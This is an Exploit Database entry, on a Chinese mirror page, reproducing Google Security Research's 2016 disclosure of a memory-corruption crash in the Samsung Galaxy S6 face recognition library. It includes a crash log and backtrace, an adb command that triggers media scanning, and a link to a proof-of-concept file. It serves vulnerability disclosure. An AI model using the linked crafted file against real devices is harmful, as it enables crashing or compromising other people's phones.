Samsung Galaxy S6 – ‘android.media.process’ ‘MdConvertLine’ Face Recognition Memory Corruption

• Exploit Database
• 17 阅读

• 作者： Google Security Research
  日期： 2016-02-08
• 类别：

  • dos
  平台：

  • android
• 来源：https://www.exploit-db.com/exploits/39425/

• Source: https://code.google.com/p/google-security-research/issues/detail?id=616
  
  The attached file causes memory corruption when iy is scanned by the face recognition library in android.media.process
  
  F/libc( 4134): Fatal signal 11 (SIGSEGV), code 1, fault addr 0x33333333333358 in tid 12161 (syncThread)
  I/DEBUG ( 3021): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
  I/DEBUG ( 3021): Build fingerprint: 'Verizon/zeroltevzw/zeroltevzw:5.1.1/LMY47X/G925VVRU4BOG9:user/release-keys'
  I/DEBUG ( 3021): Revision: '10'
  I/DEBUG ( 3021): ABI: 'arm64'
  I/DEBUG ( 3021): pid: 4134, tid: 12161, name: syncThread>>> android.process.media <<<
  I/DEBUG ( 3021): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x33333333333358
  I/DEBUG ( 3021): x0 3333333333333330x1 0000007f714b6800x2 000000000000001fx3 3333333333333330
  I/DEBUG ( 3021): x4 0000007f817fedb8x5 0000007f7c1f4ea8x6 0000007f7c1f4ec0x7 0000007f7c109680
  I/DEBUG ( 3021): x8 304b333333333333x9 3033330333000000x103333333333333333x110103304b33333333
  I/DEBUG ( 3021): x120000040033300311x130300035033333333x140300303333233333x150000000000001484
  I/DEBUG ( 3021): x160000007f74bfe828x170000007f8c086008x180000007f8c13b830x190000007f7c279a00
  I/DEBUG ( 3021): x200000000000000000x210000007f7c1036a0x220000007f817ff440x230000007f7c279a10
  I/DEBUG ( 3021): x240000000032d231a0x250000000000000065x260000000032d28880x270000000000000065
  I/DEBUG ( 3021): x280000000000000000x290000007f817fecb0x300000007f740be014
  I/DEBUG ( 3021): sp 0000007f817fecb0pc 0000007f740cefdcpstate 0000000080000000
  I/DEBUG ( 3021): 
  I/DEBUG ( 3021): backtrace:
  I/DEBUG ( 3021): #00 pc 0000000000065fdc/system/lib64/libfacerecognition.so (MdConvertLine+28)
  I/DEBUG ( 3021): #01 pc 0000000000055010/system/lib64/libfacerecognition.so (MCC_Process+160)
  
  To reproduce, download the attached file and wait, or trigger media scanning by calling:
  
  adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/
  
  
  Proof of Concept:
  https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39425.zip